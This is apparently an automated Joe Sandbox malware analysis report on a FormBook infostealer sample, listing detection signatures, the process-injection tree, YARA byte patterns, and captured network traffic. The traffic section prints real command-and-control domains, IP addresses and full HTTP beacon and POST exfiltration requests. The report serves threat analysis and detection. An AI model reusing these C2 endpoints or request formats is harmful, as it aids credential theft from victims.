Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
psibx9rXra.exe

Overview

General Information

Sample name:psibx9rXra.exe
renamed because original name is a hash value
Original sample name:29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217.exe
Analysis ID:1587985
MD5:df44b0a1b0208d51ee82419a7c9fdf47
SHA1:401684aa7cec54ac1124b8fb92cc5bb510668608
SHA256:29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • psibx9rXra.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\psibx9rXra.exe" MD5: DF44B0A1B0208D51EE82419A7C9FDF47)
    • svchost.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\psibx9rXra.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GFwdSeXZEVUZM.exe (PID: 6720 cmdline: "C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • newdev.exe (PID: 4856 cmdline: "C:\Windows\SysWOW64\newdev.exe" MD5: 4C2EACBE19E43DCEC83534AE1A8738B8)
          • GFwdSeXZEVUZM.exe (PID: 6688 cmdline: "C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c020:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1408f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e693:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\psibx9rXra.exe", CommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", ParentImage: C:\Users\user\Desktop\psibx9rXra.exe, ParentProcessId: 6228, ParentProcessName: psibx9rXra.exe, ProcessCommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", ProcessId: 6900, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\psibx9rXra.exe", CommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", ParentImage: C:\Users\user\Desktop\psibx9rXra.exe, ParentProcessId: 6228, ParentProcessName: psibx9rXra.exe, ProcessCommandLine: "C:\Users\user\Desktop\psibx9rXra.exe", ProcessId: 6900, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: psibx9rXra.exeReversingLabs: Detection: 68%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: psibx9rXra.exeJoe Sandbox ML: detected
            Source: psibx9rXra.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GFwdSeXZEVUZM.exe, 00000004.00000002.3447028542.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3446773550.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE445A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEC6D1 FindFirstFileW,FindClose,0_2_00FEC6D1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC75C
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEEF95
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF0F2
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF3F3
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE37EF
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3B12
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBCBC

            Networking

            barindex
            Source: DNS query: www.moritynomxd.xyz
            Source: Joe Sandbox ViewIP Address: 156.242.132.82 156.242.132.82
            Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
            Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
            Source: Joe Sandbox ViewASN Name: TEDRATEDRABACKBONEES TEDRATEDRABACKBONEES
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FF22EE
            Source: global trafficHTTP traffic detected: GET /0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.easestore.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
            Source: global trafficHTTP traffic detected: GET /k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.yu35n.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
            Source: global trafficHTTP traffic detected: GET /o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.moritynomxd.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
            Source: global trafficHTTP traffic detected: GET /pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.shanhaiguan.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
            Source: global trafficDNS traffic detected: DNS query: www.easestore.shop
            Source: global trafficDNS traffic detected: DNS query: www.yu35n.top
            Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.wearenotgoingback.info
            Source: unknownHTTP traffic detected: POST /k4q2/ HTTP/1.1Host: www.yu35n.topAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yu35n.topReferer: http://www.yu35n.top/k4q2/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 213Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 43 76 52 61 32 39 77 34 31 75 5a 6b 76 6a 33 6d 65 64 70 51 33 57 72 4a 52 7a 75 38 51 62 6f 73 58 4c 62 67 2b 56 73 4d 43 43 69 2f 4e 70 76 4d 67 4c 6f 61 49 71 69 6f 44 2f 56 69 4c 74 72 69 37 78 64 72 56 70 6f 70 30 64 74 72 73 78 6f 64 46 78 46 2b 2b 34 32 6e 41 2b 64 36 7a 72 43 76 77 44 6b 78 46 32 66 4e 30 47 52 54 32 33 79 66 44 4a 6d 5a 4c 77 6d 48 79 2f 62 58 6c 71 63 55 32 35 61 48 4f 68 48 52 77 58 72 70 45 67 55 45 54 67 62 59 4c 4c 64 75 78 38 56 55 7a 34 46 75 42 30 47 4f 41 6d 55 66 7a 49 56 6f 6b 65 6d 69 6b 73 79 4c 79 58 48 33 5a 4e 73 68 52 56 2f 67 Data Ascii: bxDtSjJ8=GD4o3MuP+4K8CvRa29w41uZkvj3medpQ3WrJRzu8QbosXLbg+VsMCCi/NpvMgLoaIqioD/ViLtri7xdrVpop0dtrsxodFxF++42nA+d6zrCvwDkxF2fN0GRT23yfDJmZLwmHy/bXlqcU25aHOhHRwXrpEgUETgbYLLdux8VUz4FuB0GOAmUfzIVokemiksyLyXH3ZNshRV/g
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:09:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:09:59 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:01 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:04 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shanhaiguan.net
            Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shanhaiguan.net/pjwm/
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: newdev.exe, 00000005.00000002.3446964791.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: newdev.exe, 00000005.00000003.2745077473.0000000008319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: newdev.exe, 00000005.00000002.3446964791.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: newdev.exe, 00000005.00000002.3458200823.0000000005D14000.00000004.10000000.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000034E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000377D4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9o
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00FF4164
